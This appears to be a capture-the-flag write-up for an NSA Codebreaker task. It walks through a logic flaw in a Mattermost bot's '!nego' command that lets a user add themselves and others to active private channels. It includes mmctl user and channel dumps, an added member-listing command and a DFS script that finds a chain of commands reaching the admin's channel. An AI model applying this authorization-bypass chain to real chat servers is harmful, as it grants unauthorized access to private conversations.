        logger.warning(f"incorrect number of users to run command")
        self.driver.reply_to(message, f"incorrect number of users to run command")
        return
    print(f"[DEBUG] All user_ids: {user_ids}")

    # Check if channel already has members
    existing_members = self.driver.channels.get_channel_members(channel_id)
    existing_member_user_ids = [member.get('user_id') for member in existing_members]
    existing_user_ids = any(uid in user_ids for uid in existing_member_user_ids)
    if existing_user_ids:
        # If the channel already has members, we should not add them again
        # This is a safeguard against creating duplicate entries in an archived channel
        print(f"[DEBUG] Existing members in channel {channel_id}: {existing_member_user_ids}, this shouldn't happen! archived channels should be empty")
        return
    # make sure not adding randos
    current_members_ids = [m['user_id'] for m in self.driver.channels.get_channel_members(message.channel_id)]
    if not (user_ids[0] in current_members_ids and user_ids[1] in current_members_ids and user_ids[2] in current_members_ids and user_ids[3] in current_members_ids):
        self.driver.reply_to(message, f"Could not find users")
        return

    # Add users to channel
    for uid in user_ids:
        logger.debug(f"Adding user {uid} to channel {channel_id}")
        self.driver.channels.add_channel_member(channel_id, {"user_id": uid})
    self.driver.reply_to(message, f"Created channel '{display_name}' and added users: {user1}, {user2}, {user3}")
    logger.info(f"Created channel '{display_name}' and added users: {user1}, {user2}, {user3}")

If you analyze the un-archiving functionality, you’ll realize that if an active channel with the same name already exists, the command will first error when trying to create it, then error again when trying to unarchive it. However, this second error just gets caught and reported, and the command continues. This means that we can add ourselves to any active channel we know the name of, as long as we can satisfy the other requirements of the command.
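The control flow behind this is easier to see in isolation. The following is a minimal sketch, not the bot's real code: FakeChannels and its methods are hypothetical stand-ins for the Mattermost driver calls, and both failures are simply assumed to happen the way described above for an active channel.

```python
class FakeChannels:
    """Hypothetical stand-in for the driver: one active channel already exists."""

    def __init__(self):
        self.active = {"channel42011": "id-42011"}

    def create_channel(self, name):
        if name in self.active:
            raise RuntimeError("a channel with that name already exists")
        self.active[name] = f"id-{name}"

    def get_archived(self, name):
        # Assumption: this lookup fails for a channel that is active, not archived.
        raise RuntimeError("no archived channel with that name")

    def get_channel_by_name(self, name):
        return self.active[name]


def resolve_channel(channels, name, replies):
    try:
        channels.create_channel(name)
    except Exception:
        try:
            channels.get_archived(name)
        except Exception as e:
            # Mirrors the handler: the failure is reported, but nothing returns here.
            replies.append(f"Failed to create or unarchive channel: {e}")
    # Execution falls through to the lookup, which succeeds for the active channel.
    return channels.get_channel_by_name(name)


replies = []
channel_id = resolve_channel(FakeChannels(), "channel42011", replies)
print(channel_id, replies)
```

The caller ends up holding the ID of a channel it neither created nor unarchived, which is exactly the state the rest of the handler then adds users to.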
Starting from top to bottom, these other requirements are:
- The user4 we provide must start with mod_, meaning they must be a moderator.
- We must provide 4 unique users, checked by user IDs.
- None of the users we provide can exist in the requested channel already.
- All 4 users must already be members of the channel where we issue the command.
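These four requirements can be condensed into a single predicate. This is a rough sketch rather than the bot's code: nego_allowed is a name made up here, it compares usernames instead of user IDs for brevity, and the example users are invented.

```python
def nego_allowed(users, source_members, target_members):
    """users is [user1, user2, user3, user4]; the member arguments are sets of names."""
    if len(users) != 4 or not users[3].startswith("mod_"):
        return False  # user4 must be a moderator
    if len(set(users)) != 4:
        return False  # all four users must be distinct
    if any(u in target_members for u in users):
        return False  # nobody may already be in the requested channel
    # everyone must be in the channel where the command is issued
    return all(u in source_members for u in users)


# Invented example data, not taken from the instance.
source = {"alice", "bob", "carol", "mod_dave", "erin"}
target = {"erin", "frank"}

print(nego_allowed(["alice", "bob", "carol", "mod_dave"], source, target))  # True
print(nego_allowed(["alice", "bob", "erin", "mod_dave"], source, target))   # False
```

The second call fails because erin is already a member of the target channel.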
That’s great, but what channel are we actually trying to access? Let’s go back and look at the Mattermost instance again.
Dumping the Mattermost channels
Using Mattermost’s built-in mmctl CLI tool, we can dump all the channels and users in the instance.
    $ docker compose exec mattermost mmctl --local channel list malwarecentral
    public
    channel14210 (private)
    channel15769 (private)
    channel23011 (private)
    channel28375 (private)
    channel36984 (private)
    channel37915 (private)
    channel41964 (private)
    channel42011 (private)
    channel43502 (private)
    channel45015 (private)
    channel46360 (private)
    channel51816 (private)
    channel56398 (private)
    channel60311 (private)
    channel60871 (private)
    channel6153 (private)
    channel62240 (private)
    channel62739 (private)
    channel64089 (private)
    channel76379 (private)
    channel77848 (private)
    channel78377 (private)
    channel91739 (private)

    There are 24 channels on local instance

    $ docker compose exec mattermost mmctl --local user list
    sqeoydebhtdpxreb36ddc1ztxr: admin_zestysnail91 (admin_zestysnail91@malware.xyz)
    nccuidn66fngdy3psuoearaacw: alertfish82 (alertfish82@malware.xyz)
    nmaweowaup8c3cagki3e6q5r5o: bubblyowl66 (bubblyowl66@malware.xyz)
    4o3okzr34in6xkdmsrahtzxskw: calls (calls@localhost)
    5uo9s769utfa3m8wjq1hkgmpih: cautiousferret5 (cautiousferret5@malware.xyz)
    rbtwjkm6hfgy8badbenz8t7fca: cruelbass14 (cruelbass14@malware.xyz)
    jtqbrh6s7irwjr7jrzokpkfhwa: emptyshads41 (emptyshads41@malware.xyz)
    nwfsa6s5iig4fyb4w643u8qkga: giddythrushe28 (giddythrushe28@malware.xyz)
    zxkh7mqq5pre7pkzghwj6uy6ra: insecurebasmati34 (insecurebasmati34@malware.xyz)
    eidtpjuz8jy3bd5zd3bzhsdjpr: malbot (malbot@localhost)
    4zdxb76a17fiz8r43gri7ctbwy: mod_aboardhoopoe59 (mod_aboardhoopoe59@malware.xyz)
    jeswn63kmjb1ixhfmxz4crfewa: mod_affectedeagle51 (mod_affectedeagle51@malware.xyz)
    bhsh5hnx57fcf8rpud5w8xn8dc: mod_ecstaticcheese60 (mod_ecstaticcheese60@malware.xyz)
    txjizyhehin67q64wektejoczy: mod_euphoriccoati77 (mod_euphoriccoati77@malware.xyz)
    r9uhopksxfgy8xz8ifpk5y47wh: mod_murkygatorade10 (mod_murkygatorade10@malware.xyz)
    1tmkcjt6m3g59kry1pfixqznzr: mod_wingedlion39 (mod_wingedlion39@malware.xyz)
    jg7ie7kxj3bqjrp3rjb8h5e1kc: morbidcoconut10 (morbidcoconut10@malware.xyz)
    qufpxm9t9fnjib3satjb5dua1r: playbooks (playbooks@localhost)
    oywfbkfe97d1mkyqx3ubsq4p5c: resolvedpoultry53 (resolvedpoultry53@malware.xyz)
    cby3we3cmtr33xdrs5twqok9jc: system-bot (system-bot@localhost)
    aua8kgt6yp878pct86oefoog8w: thriftyjerky58 (thriftyjerky58@malware.xyz)
    p6i8dfapjjrqudmz3qfuyk3mra: wrathfulfalcon8 (wrathfulfalcon8@malware.xyz)

    There are 22 users on local instance

While we are at it, we also need to make a token for our bot to actually run. This can also be done with mmctl:
    $ docker compose exec mattermost mmctl --local token generate malbot "bot api token"
    i6utw8yaytna9xz81sogmrxc6y: bot api token

We can put this token in bot.py, and also fix the team name while we are at it:
    bot = Bot(
        settings=Settings(
            MATTERMOST_URL = os.environ.get("MATTERMOST_URL", "http://127.0.0.1"),
            MATTERMOST_PORT = int(os.environ.get("MATTERMOST_PORT", 8065)),
            BOT_TOKEN = os.environ.get("BOT_TOKEN", "i6utw8yaytna9xz81sogmrxc6y"),
            BOT_TEAM = os.environ.get("BOT_TEAM", "malwarecentral"),
            SSL_VERIFY = os.environ.get("SSL_VERIFY", "False") == "True",
            RESPOND_CHANNEL_HELP=True,
        ),
        plugins=[SalesPlugin(), HelpPlugin(), OnboardingPlugin(),ManageChannelPlugin(),AdminPlugin()],
    )

Now back to the nego command. As part of our requirements, we need to ensure that the users we provide are not members of the target channel, so we need some way to dump the users of a given channel. However, as it turns out, there is no way to do so with mmctl!
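For reference, the direct REST route is short. The sketch below was not part of the original solve and was not run against the instance. It assumes the local server listens on http://127.0.0.1:8065 and that the token is allowed to read the channel; members_url, api_get, and channel_member_ids are helper names made up for this example. The endpoint used is Mattermost's GET /api/v4/channels/{channel_id}/members.

```python
import json
import urllib.request

BASE_URL = "http://127.0.0.1:8065"  # assumption: the local Docker instance


def members_url(base_url, channel_id, page=0, per_page=60):
    """Build the URL for one page of a channel's member list."""
    return f"{base_url}/api/v4/channels/{channel_id}/members?page={page}&per_page={per_page}"


def api_get(url, token):
    """Send an authenticated GET request and decode the JSON response."""
    req = urllib.request.Request(url, headers={"Authorization": f"Bearer {token}"})
    with urllib.request.urlopen(req) as resp:
        return json.load(resp)


def channel_member_ids(base_url, token, channel_id):
    """Return the user IDs on the first page of members (enough for small channels)."""
    return [m["user_id"] for m in api_get(members_url(base_url, channel_id), token)]


# No request is sent here; this only shows the URL that would be fetched.
print(members_url(BASE_URL, "<channel_id>"))
```

Turning the returned user IDs into usernames would need one more lookup per user, which is the part the bot command below handles through the driver instead.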
But I didn’t want to bother figuring out how to use the API directly, so I just hijacked the bot to add a command that would dump the members of a given channel for me. I added the following command to plugin_sales.py:
    @listen_to("^!list_users (.*)$", no_direct=True, human_description="!list_users\n\tList all users in the given channel(s).")
    def list_users_cmd(self, message: Message, *args):
        logger.debug(f"list_users_cmd called with message: {message.text}")
        args = message.text.strip().split()
        if len(args) < 2:
            self.driver.reply_to(message, "Usage: !list_users channel_name [channel_name ...]")
            logger.warning("list_users_cmd: Incorrect number of arguments")
            return
        _, *channel_names = args
        for channel_name in channel_names:
            team_name = self.driver.options.get('team', 'malwarecentral')
            team = self.driver.teams.get_team_by_name(team_name)
            team_id = team.get('id') if isinstance(team, dict) else team.json().get('id')
            channel = self.driver.channels.get_channel_by_name(team_id, channel_name)
            if not channel:
                self.driver.reply_to(message, f"Channel '{channel_name}' not found.")
                logger.warning(f"list_users_cmd: Channel '{channel_name}' not found.")
                return
            channel_id = channel.get('id') if isinstance(channel, dict) else channel.json().get('id')
            members = self.driver.channels.get_channel_members(channel_id)
            user_list = []
            for member in members:
                user_id = member.get('user_id')
                user = self.driver.users.get_user(user_id)
                username = user.get('username') if isinstance(user, dict) else user.json().get('username')
                user_list.append(username)
            self.driver.reply_to(message, f"Users in channel '{channel_name}':\n{user_list}")
            logger.info(f"list_users_cmd: Listed users in channel '{channel_name}'")

Now we simply take all the channel names we dumped earlier, and run the command on all of them. Then we wait for the bot to do the work for us, and extract the usernames from the replies:
    # for some reason other versions may be a bit unstable, blame python
    uv venv -p python3.12
    source .venv/bin/activate
    uv pip install mmpy_bot loguru dotenv
    python3 bot.py
This gives us a final list of channels and their users:
'public':['mod_murkygatorade10', 'emptyshads41', 'cruelbass14', 'bubblyowl66', 'giddythrushe28', 'cautiousferret5', 'malbot', 'resolvedpoultry53', 'insecurebasmati34']
'channel14210':['mod_wingedlion39', 'mod_ecstaticcheese60', 'mod_aboardhoopoe59', 'thriftyjerky58', 'mod_affectedeagle51', 'morbidcoconut10', 'alertfish82', 'resolvedpoultry53', 'mod_murkygatorade10', 'malbot', 'bubblyowl66', 'wrathfulfalcon8', 'cruelbass14', 'mod_euphoriccoati77', 'insecurebasmati34']
'channel15769':['insecurebasmati34', 'mod_wingedlion39', 'mod_aboardhoopoe59', 'thriftyjerky58', 'mod_ecstaticcheese60', 'malbot', 'mod_affectedeagle51', 'morbidcoconut10', 'alertfish82', 'giddythrushe28', 'resolvedpoultry53', 'wrathfulfalcon8', 'mod_murkygatorade10', 'cruelbass14', 'mod_euphoriccoati77']
'channel23011':['giddythrushe28', 'wrathfulfalcon8', 'insecurebasmati34', 'resolvedpoultry53', 'mod_wingedlion39', 'mod_aboardhoopoe59', 'thriftyjerky58', 'mod_ecstaticcheese60', 'mod_affectedeagle51', 'morbidcoconut10', 'emptyshads41', 'alertfish82', 'bubblyowl66', 'mod_euphoriccoati77', 'malbot']
'channel28375':['bubblyowl66', 'cruelbass14', 'mod_aboardhoopoe59', 'thriftyjerky58', 'mod_ecstaticcheese60', 'mod_murkygatorade10', 'mod_wingedlion39', 'mod_affectedeagle51', 'emptyshads41', 'giddythrushe28', 'resolvedpoultry53', 'wrathfulfalcon8', 'malbot', 'mod_euphoriccoati77', 'insecurebasmati34']
'channel36984':['thriftyjerky58', 'mod_affectedeagle51', 'morbidcoconut10', 'mod_wingedlion39', 'mod_aboardhoopoe59', 'mod_ecstaticcheese60', 'emptyshads41', 'alertfish82', 'giddythrushe28', 'resolvedpoultry53', 'cruelbass14', 'malbot', 'bubblyowl66', 'wrathfulfalcon8', 'mod_murkygatorade10']
'channel37915':['mod_wingedlion39', 'mod_aboardhoopoe59', 'thriftyjerky58', 'mod_ecstaticcheese60', 'malbot', 'mod_affectedeagle51', 'morbidcoconut10', 'emptyshads41', 'alertfish82', 'giddythrushe28', 'resolvedpoultry53', 'wrathfulfalcon8', 'mod_murkygatorade10', 'cruelbass14', 'insecurebasmati34']
'channel41964':['mod_wingedlion39', 'mod_aboardhoopoe59', 'thriftyjerky58', 'mod_affectedeagle51', 'morbidcoconut10', 'emptyshads41', 'bubblyowl66', 'resolvedpoultry53', 'mod_euphoriccoati77', 'alertfish82', 'malbot', 'mod_ecstaticcheese60', 'giddythrushe28', 'wrathfulfalcon8', 'mod_murkygatorade10']
'channel42011':['mod_wingedlion39', 'thriftyjerky58', 'mod_ecstaticcheese60', 'emptyshads41', 'bubblyowl66', 'mod_murkygatorade10', 'mod_euphoriccoati77', 'mod_aboardhoopoe59', 'giddythrushe28', 'resolvedpoultry53', 'wrathfulfalcon8', 'admin_zestysnail91', 'insecurebasmati34', 'malbot', 'cruelbass14']
'channel43502':['mod_wingedlion39', 'mod_aboardhoopoe59', 'mod_ecstaticcheese60', 'malbot', 'mod_affectedeagle51', 'emptyshads41', 'alertfish82', 'bubblyowl66', 'giddythrushe28', 'resolvedpoultry53', 'mod_murkygatorade10', 'cruelbass14']
'channel45015':['mod_wingedlion39', 'mod_aboardhoopoe59', 'thriftyjerky58', 'mod_ecstaticcheese60', 'malbot', 'morbidcoconut10', 'emptyshads41', 'bubblyowl66', 'giddythrushe28', 'resolvedpoultry53', 'wrathfulfalcon8', 'mod_murkygatorade10', 'cruelbass14', 'mod_euphoriccoati77', 'insecurebasmati34']
'channel46360':['mod_aboardhoopoe59', 'morbidcoconut10', 'mod_wingedlion39', 'mod_ecstaticcheese60', 'mod_affectedeagle51', 'emptyshads41', 'bubblyowl66', 'giddythrushe28', 'mod_murkygatorade10', 'insecurebasmati34', 'malbot', 'cruelbass14', 'alertfish82', 'wrathfulfalcon8', 'mod_euphoriccoati77']
'channel51816':['mod_wingedlion39', 'mod_aboardhoopoe59', 'thriftyjerky58', 'mod_ecstaticcheese60', 'malbot', 'mod_affectedeagle51', 'morbidcoconut10', 'emptyshads41', 'alertfish82', 'bubblyowl66', 'giddythrushe28', 'wrathfulfalcon8', 'cruelbass14', 'mod_euphoriccoati77', 'insecurebasmati34']
'channel56398':['mod_aboardhoopoe59', 'mod_ecstaticcheese60', 'emptyshads41', 'cruelbass14', 'alertfish82', 'bubblyowl66', 'resolvedpoultry53', 'wrathfulfalcon8', 'mod_murkygatorade10', 'malbot', 'thriftyjerky58', 'mod_affectedeagle51', 'giddythrushe28', 'mod_euphoriccoati77', 'insecurebasmati34']
'channel60311':['alertfish82', 'mod_aboardhoopoe59', 'emptyshads41', 'bubblyowl66', 'giddythrushe28', 'mod_euphoriccoati77', 'insecurebasmati34', 'malbot', 'mod_wingedlion39', 'mod_affectedeagle51', 'morbidcoconut10', 'resolvedpoultry53', 'wrathfulfalcon8', 'mod_murkygatorade10', 'cruelbass14']
'channel60871':['cruelbass14', 'mod_wingedlion39', 'mod_aboardhoopoe59', 'thriftyjerky58', 'mod_ecstaticcheese60', 'morbidcoconut10', 'alertfish82', 'bubblyowl66', 'malbot', 'giddythrushe28', 'resolvedpoultry53', 'wrathfulfalcon8', 'mod_murkygatorade10', 'mod_euphoriccoati77', 'insecurebasmati34']
'channel6153':['mod_affectedeagle51', 'morbidcoconut10', 'mod_wingedlion39', 'mod_aboardhoopoe59', 'thriftyjerky58', 'mod_ecstaticcheese60', 'malbot', 'emptyshads41', 'alertfish82', 'bubblyowl66', 'resolvedpoultry53', 'wrathfulfalcon8', 'mod_murkygatorade10', 'mod_euphoriccoati77', 'insecurebasmati34']
'channel62240':['wrathfulfalcon8', 'mod_affectedeagle51', 'mod_euphoriccoati77', 'emptyshads41', 'bubblyowl66', 'giddythrushe28', 'resolvedpoultry53', 'malbot', 'mod_wingedlion39', 'mod_aboardhoopoe59', 'mod_ecstaticcheese60']
'channel62739':['mod_wingedlion39', 'mod_aboardhoopoe59', 'thriftyjerky58', 'mod_ecstaticcheese60', 'malbot', 'mod_affectedeagle51', 'morbidcoconut10', 'emptyshads41', 'alertfish82', 'bubblyowl66', 'giddythrushe28', 'resolvedpoultry53', 'mod_murkygatorade10', 'cruelbass14', 'mod_euphoriccoati77']
'channel64089':['mod_euphoriccoati77', 'insecurebasmati34', 'mod_wingedlion39', 'mod_aboardhoopoe59', 'mod_ecstaticcheese60', 'malbot', 'mod_affectedeagle51', 'emptyshads41', 'alertfish82', 'bubblyowl66', 'giddythrushe28', 'resolvedpoultry53', 'wrathfulfalcon8', 'mod_murkygatorade10', 'cruelbass14']
'channel76379':['mod_wingedlion39', 'mod_aboardhoopoe59', 'thriftyjerky58', 'mod_ecstaticcheese60', 'malbot', 'mod_affectedeagle51', 'morbidcoconut10', 'emptyshads41', 'bubblyowl66', 'giddythrushe28', 'resolvedpoultry53', 'mod_murkygatorade10', 'cruelbass14', 'mod_euphoriccoati77', 'insecurebasmati34']
'channel77848':['mod_wingedlion39', 'thriftyjerky58', 'mod_ecstaticcheese60', 'malbot', 'mod_affectedeagle51', 'morbidcoconut10', 'emptyshads41', 'alertfish82', 'bubblyowl66', 'giddythrushe28', 'resolvedpoultry53', 'mod_murkygatorade10', 'cruelbass14', 'mod_euphoriccoati77', 'insecurebasmati34']
'channel78377':['emptyshads41', 'mod_affectedeagle51', 'mod_ecstaticcheese60', 'mod_wingedlion39', 'insecurebasmati34', 'cruelbass14', 'malbot', 'morbidcoconut10', 'bubblyowl66', 'giddythrushe28', 'resolvedpoultry53', 'mod_murkygatorade10', 'mod_euphoriccoati77']
'channel91739':['alertfish82', 'mod_euphoriccoati77', 'morbidcoconut10', 'emptyshads41', 'giddythrushe28', 'wrathfulfalcon8', 'mod_murkygatorade10', 'cruelbass14', 'insecurebasmati34', 'mod_wingedlion39', 'mod_aboardhoopoe59', 'thriftyjerky58', 'mod_ecstaticcheese60', 'malbot', 'mod_affectedeagle51']

Given that admin_zestysnail91 appears in only one channel and is the only admin in the instance, they are probably the adversary we need to reach. That means we somehow need to get into channel42011 using only nego commands.
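Spotting this by eye works, but inverting the mapping makes it explicit. The following is a small sketch on a trimmed subset of the dump above (three channels, member lists shortened); channels_per_user is a helper name invented for this example.

```python
from collections import defaultdict


def channels_per_user(channels):
    """Invert {channel: [users]} into {user: [channels]}."""
    index = defaultdict(list)
    for name, members in channels.items():
        for user in members:
            index[user].append(name)
    return dict(index)


# Trimmed subset of the real dump, for illustration only.
sample = {
    "public": ["cautiousferret5", "malbot", "cruelbass14"],
    "channel42011": ["admin_zestysnail91", "malbot", "cruelbass14"],
    "channel43502": ["malbot", "cruelbass14"],
}

index = channels_per_user(sample)
print(index["admin_zestysnail91"])  # prints ['channel42011']
```

Run against the full dump, the same lookup should single out channel42011 for the admin account.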
The final stretch
To find a valid path, we can write a quick DFS script that will check all the channels reachable from every channel we can access, until we find one that contains admin_zestysnail91.
    users = ['admin_zestysnail91', 'alertfish82', 'bubblyowl66', 'calls', 'cautiousferret5', 'cruelbass14', 'emptyshads41', 'giddythrushe28', 'insecurebasmati34', 'malbot', 'mod_aboardhoopoe59', 'mod_affectedeagle51', 'mod_ecstaticcheese60', 'mod_euphoriccoati77', 'mod_murkygatorade10', 'mod_wingedlion39', 'morbidcoconut10', 'playbooks', 'resolvedpoultry53', 'system', 'thriftyjerky58', 'wrathfulfalcon8']

    channels = open('channels.txt').read().split('\n\n')
    channels = {
        channel.split('\n')[0][1:-2]: eval(channel.split('\n')[1])
        for channel in channels
    }

    ME = 'cautiousferret5'
    start = 'public'
    end = 'channel42011'

    def find_members(channel_a, channel_b):
        # return a group of members that we can use to move from channel_a to channel_b
        usable_members = set(channels[channel_a]) - set(channels[channel_b])
        if ME not in usable_members:
            return None
        usable_members.remove(ME)

        mods = [user for user in usable_members if user.startswith('mod_')]
        if len(mods) < 1:
            return None
        mod = mods[0]

        non_mods = [user for user in usable_members if not user.startswith('mod_')]
        if len(non_mods) < 2:
            return None
        return [ME] + non_mods[:2] + [mod]

    def dfs(current, path):
        print(f'At {current}, path {path}')
        for channel in channels:
            members = find_members(current, channel)
            if not members:
                continue

            if channel == end:
                return path + [(channel, members)]
            result = dfs(channel, path + [(channel, members)])
            if result:
                return result
        return None

    path = dfs(start, [(start, [])])
    for channel, members in path[1:]:
        print(f'!nego {channel} ' + ' '.join(members[1:]))

However, if we run this script, we don’t get anything…
    $ python3 solve_1.py
    At public, path [('public', [])]
    At channel62240, path [('public', []), ('channel62240', ['cautiousferret5', 'insecurebasmati34', 'cruelbass14', 'mod_murkygatorade10'])]
    Traceback (most recent call last):
      File "/mnt/c/Users/flocto/Documents/Cybersecurity/2025/NSACodebreaker/task6/writeup/solve_1.py", line 44, in <module>
        for channel, members in path:
    TypeError: 'NoneType' object is not iterable

I was stuck here for a while until I realized I had overlooked one thing: once we add ourselves to a channel using the !nego command, we bring all the users in the command with us! Then, we can use those users to further move into other channels.
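This also explains the dead end: find_members gives up whenever ME is missing from the current channel's list, and the static dump never lists us in channel62240. Here is a minimal sketch of the missing state update, using the channel62240 member list from the dump above; apply_nego is a helper name made up for this illustration.

```python
ME = "cautiousferret5"

# channel62240 as it appears in the static dump.
channels = {
    "channel62240": [
        "wrathfulfalcon8", "mod_affectedeagle51", "mod_euphoriccoati77",
        "emptyshads41", "bubblyowl66", "giddythrushe28", "resolvedpoultry53",
        "malbot", "mod_wingedlion39", "mod_aboardhoopoe59", "mod_ecstaticcheese60",
    ],
}


def apply_nego(channels, target, group):
    """Record that every user named in a successful !nego is now in the target."""
    channels[target].extend(u for u in group if u not in channels[target])


first_hop = [ME, "cruelbass14", "insecurebasmati34", "mod_murkygatorade10"]

print(ME in channels["channel62240"])  # False: no onward move is possible yet
apply_nego(channels, "channel62240", first_hop)
print(ME in channels["channel62240"])  # True: we and our companions can move on
```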
Patching the script to account for that, we get the following final version:
    users = ['admin_zestysnail91', 'alertfish82', 'bubblyowl66', 'calls', 'cautiousferret5', 'cruelbass14', 'emptyshads41', 'giddythrushe28', 'insecurebasmati34', 'malbot', 'mod_aboardhoopoe59', 'mod_affectedeagle51', 'mod_ecstaticcheese60', 'mod_euphoriccoati77', 'mod_murkygatorade10', 'mod_wingedlion39', 'morbidcoconut10', 'playbooks', 'resolvedpoultry53', 'system', 'thriftyjerky58', 'wrathfulfalcon8']

    channels = open('channels.txt').read().split('\n\n')
    channels = {
        channel.split('\n')[0][1:-2]: eval(channel.split('\n')[1])
        for channel in channels
    }

    ME = 'cautiousferret5'
    start = 'public'
    end = 'channel42011'

    def find_members(channel_a, channel_b):
        # return a group of members that we can use to move from channel_a to channel_b
        usable_members = set(channels[channel_a]) - set(channels[channel_b])
        if ME not in usable_members:
            return None
        usable_members.remove(ME)

        mods = [user for user in usable_members if user.startswith('mod_')]
        if len(mods) < 1:
            return None
        mod = mods[0]

        non_mods = [user for user in usable_members if not user.startswith('mod_')]
        if len(non_mods) < 2:
            return None
        return [ME] + non_mods[:2] + [mod]

    def dfs(current, path):
        print(f'At {current}, path {path}')
        for channel in channels:
            members = find_members(current, channel)
            if not members:
                continue

            if channel == end:
                return path + [(channel, members)]
            channels[channel].extend(members)  # add all members to the channel
            result = dfs(channel, path + [(channel, members)])
            if result:
                return result
        return None

    path = dfs(start, [(start, [])])
    for channel, members in path[1:]:
        print(f'!nego {channel} ' + ' '.join(members[1:]))

This gives us:
    $ python3 solve_1.py
    At public, path [('public', [])]
    At channel62240, path [('public', []), ('channel62240', ['cautiousferret5', 'cruelbass14', 'insecurebasmati34', 'mod_murkygatorade10'])]
    At channel43502, path [('public', []), ('channel62240', ['cautiousferret5', 'cruelbass14', 'insecurebasmati34', 'mod_murkygatorade10']), ('channel43502', ['cautiousferret5', 'wrathfulfalcon8', 'insecurebasmati34', 'mod_euphoriccoati77'])]
    At channel78377, path [('public', []), ('channel62240', ['cautiousferret5', 'cruelbass14', 'insecurebasmati34', 'mod_murkygatorade10']), ('channel43502', ['cautiousferret5', 'wrathfulfalcon8', 'insecurebasmati34', 'mod_euphoriccoati77']), ('channel78377', ['cautiousferret5', 'alertfish82', 'wrathfulfalcon8', 'mod_aboardhoopoe59'])]
    !nego channel62240 cruelbass14 insecurebasmati34 mod_murkygatorade10
    !nego channel43502 wrathfulfalcon8 insecurebasmati34 mod_euphoriccoati77
    !nego channel78377 alertfish82 wrathfulfalcon8 mod_aboardhoopoe59
    !nego channel42011 alertfish82 morbidcoconut10 mod_affectedeagle51

We can run these commands one by one in Mattermost, and finally we get access to channel42011, where admin_zestysnail91 resides!
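As a sanity check, the four commands can be replayed offline against the dumped member lists. This is a sketch under a few assumptions: the sender counts as user1, each command is issued from the channel joined by the previous one (starting in public), and the checks compare usernames rather than user IDs. The replay function is a name invented here.

```python
ME = "cautiousferret5"

# Member lists for the five channels on the path, copied from the dump above.
channels = {
    "public": set("mod_murkygatorade10 emptyshads41 cruelbass14 bubblyowl66 giddythrushe28 cautiousferret5 malbot resolvedpoultry53 insecurebasmati34".split()),
    "channel62240": set("wrathfulfalcon8 mod_affectedeagle51 mod_euphoriccoati77 emptyshads41 bubblyowl66 giddythrushe28 resolvedpoultry53 malbot mod_wingedlion39 mod_aboardhoopoe59 mod_ecstaticcheese60".split()),
    "channel43502": set("mod_wingedlion39 mod_aboardhoopoe59 mod_ecstaticcheese60 malbot mod_affectedeagle51 emptyshads41 alertfish82 bubblyowl66 giddythrushe28 resolvedpoultry53 mod_murkygatorade10 cruelbass14".split()),
    "channel78377": set("emptyshads41 mod_affectedeagle51 mod_ecstaticcheese60 mod_wingedlion39 insecurebasmati34 cruelbass14 malbot morbidcoconut10 bubblyowl66 giddythrushe28 resolvedpoultry53 mod_murkygatorade10 mod_euphoriccoati77".split()),
    "channel42011": set("mod_wingedlion39 thriftyjerky58 mod_ecstaticcheese60 emptyshads41 bubblyowl66 mod_murkygatorade10 mod_euphoriccoati77 mod_aboardhoopoe59 giddythrushe28 resolvedpoultry53 wrathfulfalcon8 admin_zestysnail91 insecurebasmati34 malbot cruelbass14".split()),
}

commands = """\
!nego channel62240 cruelbass14 insecurebasmati34 mod_murkygatorade10
!nego channel43502 wrathfulfalcon8 insecurebasmati34 mod_euphoriccoati77
!nego channel78377 alertfish82 wrathfulfalcon8 mod_aboardhoopoe59
!nego channel42011 alertfish82 morbidcoconut10 mod_affectedeagle51
""".splitlines()


def replay(channels, commands, start="public"):
    """Apply each command in order, raising ValueError if a requirement fails."""
    current = start
    for line in commands:
        _, target, *others = line.split()
        group = [ME] + others  # assumption: the sender is user1
        if not group[3].startswith("mod_"):
            raise ValueError(f"{line}: user4 is not a moderator")
        if len(set(group)) != 4:
            raise ValueError(f"{line}: users are not unique")
        if set(group) & channels[target]:
            raise ValueError(f"{line}: someone is already in {target}")
        if not set(group) <= channels[current]:
            raise ValueError(f"{line}: someone is missing from {current}")
        channels[target] |= set(group)  # everyone named moves along with us
        current = target
    return current


final = replay(channels, commands)
print(final, "admin_zestysnail91" in channels[final])
```

All four hops pass the checks, and the final channel contains both our user and admin_zestysnail91.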

Submitting the list of commands, we successfully finish task 6.